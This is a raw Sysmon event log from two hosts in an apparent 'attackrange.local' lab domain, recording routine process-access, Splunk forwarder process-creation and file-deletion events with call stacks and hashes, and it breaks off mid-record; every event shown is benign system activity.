10341000x8000000000000000979933Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979932Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8C25-6151-EA79-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979931Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C25-6151-EA79-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979930Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.697{69CF5F33-8C25-6151-EA79-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.426{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-walMD5=DB82B2F7AB06F7C9DF6CBED35F75A821,SHA256=88DAEB71BBD011C4E3D0A96F867E8272D6F13DCAAF42A0E32D64E80506D59098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.425{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-shmMD5=0CF7C64F9DDAE76D0829D3103667CC23,SHA256=E32AC0E0AC3E3AA66A2BDA084424D7381D938BEB7C6D85B6F420A17AFDEE912C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.419{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=B0FBA65380CD9A18AB15B80D112232D7,SHA256=BDA012AE1CA7A744519953BAA48E076632F7201D05104C80628C4411700229A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.399{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++www.google.com\ls\usageMD5=841561654ABAC21517A0DCE8690ADFE6,SHA256=3441CDDA8D8CD052F850786ADD6D022CD73AACB1E581F5A305E5D3DDA35ED458,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979974Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C26-6151-EC79-00000000FD01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979973Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979972Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979971Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979970Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979969Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979968Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979967Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979966Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979965Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979964Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8C26-6151-EC79-00000000FD01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979963Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.993{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C26-6151-EC79-00000000FD01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979962Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.979{69CF5F33-8C26-6151-EC79-00000000FD01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979961Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0299732001617EC2F8B968F9D3B9DAD4,SHA256=A2F122BFA0AC781D60D464BBBBBECC97293156359E0837A56CCCAFC90936C507,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:26.546{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11321C24BD61ECDA50704B971C968A79,SHA256=903FBFC1F7BE6EEA007B5BB949F44289B8DB5C59F743BB23FEA3C8DCBD26FD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979960Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.712{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D4F34BD2EF3AB1AA9000AD9C2DF008F,SHA256=07F9049BDF7DC9EE6CB44A24DC6B0A5019F375C6D89646B6CFFFE48134E945D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979959Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.712{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A8A93BFB0FE48980C7FEBDA88B4F297,SHA256=62498BE1D05EE2A2D754632F52D055065E58D9B003D2607B4B89DCA26C11B944,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979958Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.634{69CF5F33-8C26-6151-EB79-00000000FD01}36322636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979957Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C26-6151-EB79-00000000FD01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979956Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979955Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979954Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979953Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 